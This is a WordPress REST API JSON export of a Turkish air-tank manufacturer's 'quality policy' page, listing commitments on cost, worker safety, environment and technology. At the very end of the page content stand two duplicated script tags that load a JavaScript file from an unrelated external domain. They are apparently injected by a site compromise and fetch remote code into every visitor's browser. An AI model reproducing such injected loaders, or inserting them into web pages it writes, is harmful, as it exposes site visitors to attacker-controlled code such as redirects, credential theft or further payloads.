{"id":734,"date":"2021-04-12T17:04:06","date_gmt":"2021-04-12T14:04:06","guid":{"rendered":"http:\/\/gensalimited.com.tr\/index.php\/hakkimizda-copy\/"},"modified":"2021-04-13T17:38:06","modified_gmt":"2021-04-13T14:38:06","slug":"kalite-politikamiz","status":"publish","type":"page","link":"https:\/\/gensalimited.com.tr\/index.php\/kalite-politikamiz\/","title":{"rendered":"Kalite Politikam\u0131z"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;736&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>\u00dcretim maliyetlerini minimize ederek kalite anlay\u0131\u015f\u0131ndan \u00f6d\u00fcn vermeden verimlili\u011fi ve karl\u0131l\u0131\u011f\u0131 artt\u0131rmak,<\/li>\n<li>\u00dcretimimizin t\u00fcm safhalar\u0131nda, \u00e7al\u0131\u015fanlar\u0131m\u0131za ISG ve \u00c7evre konusunda e\u011fitimler d\u00fczenleyerek \u00e7evreyi korumay\u0131, insan sa\u011fl\u0131\u011f\u0131 ve g\u00fcvenli\u011fi noktas\u0131nda \u00fcretim \u015fartlar\u0131m\u0131z\u0131 olu\u015fturuyoruz,<\/li>\n<li>\u00dcretti\u011fimiz hava ve di\u011fer tanklar\u0131m\u0131zda kaliteden \u00f6d\u00fcn vermemek i\u00e7in bu sorumlulu\u011fu en iyi \u015fekilde \u00e7al\u0131\u015fanlar\u0131m\u0131za a\u015f\u0131lamak,<\/li>\n<li>\u00dcretimlerin g\u00fcncel ve geli\u015fen teknolojilere uyum i\u00e7in ger\u00e7ekle\u015ftirerek hem s\u00fcre\u00e7lerin iyile\u015fmesini hem de ulusal ve uluslararas\u0131 pazarda rekabet \u00fcst\u00fcnl\u00fc\u011f\u00fc sa\u011flayacak \u015fekilde geli\u015fmek,<\/li>\n<li><strong>\u00a0<\/strong>Kalitemizi geli\u015ftirmek ve \u00e7al\u0131\u015fanlar\u0131m\u0131z taraf\u0131ndan anla\u015f\u0131l\u0131r ve benimsenebilir olmas\u0131 amac\u0131yla, d\u00fczenli olarak yapt\u0131\u011f\u0131m\u0131z toplant\u0131larda geli\u015fen Hava Tank\u0131 sekt\u00f6r\u00fcn\u00fc kalitemizle b\u00fcy\u00fctmek ad\u0131na geli\u015ftirmelerimize her ge\u00e7en g\u00fcn devam etmekteyiz.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;736&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text] \u00dcretim maliyetlerini minimize ederek kalite anlay\u0131\u015f\u0131ndan \u00f6d\u00fcn vermeden verimlili\u011fi ve karl\u0131l\u0131\u011f\u0131 artt\u0131rmak, \u00dcretimimizin t\u00fcm safhalar\u0131nda, \u00e7al\u0131\u015fanlar\u0131m\u0131za ISG ve \u00c7evre&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-734","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/734","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=734"}],"version-history":[{"count":7,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/734\/revisions"}],"predecessor-version":[{"id":1160,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/734\/revisions\/1160"}],"wp:attachment":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=734"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}